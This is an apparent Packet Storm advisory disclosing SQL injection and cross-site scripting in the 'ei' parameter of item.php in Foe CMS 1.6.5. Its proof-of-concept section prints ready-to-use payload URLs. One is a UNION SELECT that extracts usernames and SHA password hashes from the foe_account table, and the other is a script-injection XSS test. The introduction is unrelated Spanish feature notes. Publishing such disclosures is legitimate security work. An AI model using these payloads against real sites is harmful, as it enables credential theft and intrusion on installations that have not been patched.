Foe CMS 1.6.5 Cross Site Scripting / SQL Injection

2013-04-29T00:00:00
ID PACKETSTORM:121447
Type packetstorm
Reporter flux77
Modified 2013-04-29T00:00:00

Description

                                        
                                            `Title: Foe CMS 1.6.5 SQL Injection Vulnerability  
Vendor: http://foecms.com/  
Download: http://code.google.com/p/foecms/downloads/list  
Versions: 1.6.5  
Platform: linux, windows  
Bug: SQL Injection | Cross Site Scripting  
  
  
  
-------------------------------------------------------  
  
1) Introduction  
2) Bug  
3) Proof of concept  
4) Credits  
  
  
===========  
1) Introduction  
===========  
  
Gestor de categorias (Como phpbb3)  
Pasar a php orientado a objetos  
account_meta para firma, ocupacion, avatar, etc (como wordpress) permite añadir y quitar campos a gusto  
Permisos segun rangos para TODO  
Pagina del UCP para cambiar los permisos de acceso (amigos y eso)  
  
  
======  
2) Bug  
======  
  
SQL Injection  
http://victim/[path]/item.php?ei=[SQLi]  
  
Cross Site Scripting  
http://victim/[path]/item.php?ei=[XSS]  
  
  
=====  
3)proof of concept  
=====  
  
Example SQLi  
http://victim/[path]/item.php?ei=-1 union select 1,username,pass_sha,1,1,1,1,1,1 from foe_account--  
  
Example XSS  
http://victim/[path]/item.php?ei=<script>alert(1)</script>  
  
  
=====  
4)Credits  
=====  
  
flux77  
Contact : 0xflux77 at gmail.com  
  
`